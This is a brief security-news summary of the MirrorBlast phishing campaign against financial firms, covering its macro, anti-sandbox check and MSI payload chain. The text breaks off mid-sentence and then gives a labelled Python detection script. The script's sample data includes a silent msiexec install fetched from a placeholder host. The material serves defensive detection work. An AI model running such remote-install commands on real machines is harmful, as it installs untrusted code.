MirrorBlast, the New Phishing Campaign Targeting Financial Organizations

A fresh variant of a phishing campaign has recently been detected. Nicknamed MirrorBlast, it targets finance enterprises. Its attack method relies on malicious Excel documents that are almost untraceable.

MirrorBlast: How Does It Work?

The campaign was discovered by researchers at Morphisec Labs. According to their report, here is how MirrorBlast works:

- It uses obfuscated malicious code.
- The macro code can only be executed on a 32-bit version of Office.
- After the target opens the compromised file and clicks "enable content", the macro executes a JScript script.
- This in turn triggers the download and installation of an MSI package.
- Before that, however, the macro performs an anti-sandboxing check: it establishes whether the computer name and the user domain are the same and whether the user name is "admin".
- The MSI package comes in two versions: one built on the programming language REBOL, the other on KiXtart.
  - REBOL version: base64 encoded, it has the role of data exfiltration, for instance OS version, user name, or architecture. A second stage follows, in which PowerShell is initiated through the C2 command.
  - KiXtart version has also the
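A detection view of the chain described above, as an added example that is not from Morphisec's report or the original article: it flags an installer process that descends from Excel in process-creation telemetry. The image names, event fields and sample events are assumptions constructed for illustration.

```python
from collections import namedtuple

OFFICE = {"excel.exe"}                         # assumed image name of the Excel host
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # assumed JScript hosts; optional in the chain
INSTALLER = "msiexec.exe"                      # Windows Installer client
Proc = namedtuple("Proc", "pid ppid image cmdline")  # hypothetical event schema

def ancestors(pid, by_pid):
    """Image names from the parent of `pid` upward; stops on unknown parents or loops."""
    chain, seen = [], {pid}
    cur = by_pid[pid]
    while cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        chain.append(cur.image.lower())
    return chain

def find_office_msi_chains(events):
    """Flag installer processes that have an Office application as an ancestor."""
    by_pid = {e.pid: e for e in events}  # assumes PIDs are unique within the window
    hits = []
    for e in events:
        if e.image.lower() != INSTALLER:
            continue
        chain = ancestors(e.pid, by_pid)
        if not OFFICE.intersection(chain):
            continue
        cmd = e.cmdline.lower()
        hits.append({
            "pid": e.pid,
            "chain": chain,
            "via_script_host": bool(SCRIPT_HOSTS.intersection(chain)),
            "remote_package": "http://" in cmd or "https://" in cmd,
        })
    return hits

# Constructed sample events (not from the report); example.invalid is a placeholder host.
SAMPLE = [
    Proc(100, 1, "explorer.exe", "explorer.exe"),
    Proc(200, 100, "EXCEL.EXE", 'EXCEL.EXE "C:\\Users\\u\\Downloads\\invoice.xls"'),
    Proc(300, 200, "wscript.exe", "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\a.js"),
    Proc(400, 300, "msiexec.exe", "msiexec.exe /i https://example.invalid/pkg.msi /qn"),
    Proc(500, 100, "msiexec.exe", "msiexec.exe /i C:\\Installers\\tool.msi"),
]

if __name__ == "__main__":
    for hit in find_office_msi_chains(SAMPLE):
        print(hit)
```

The script host is treated as optional because a macro can start the installer without an intermediate process, so the Excel ancestor alone is the trigger.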

Read More: https://heimdalsecurity.com/blog/mirrorblast-the-new-phishing-campaign-targeting-financial-organizations/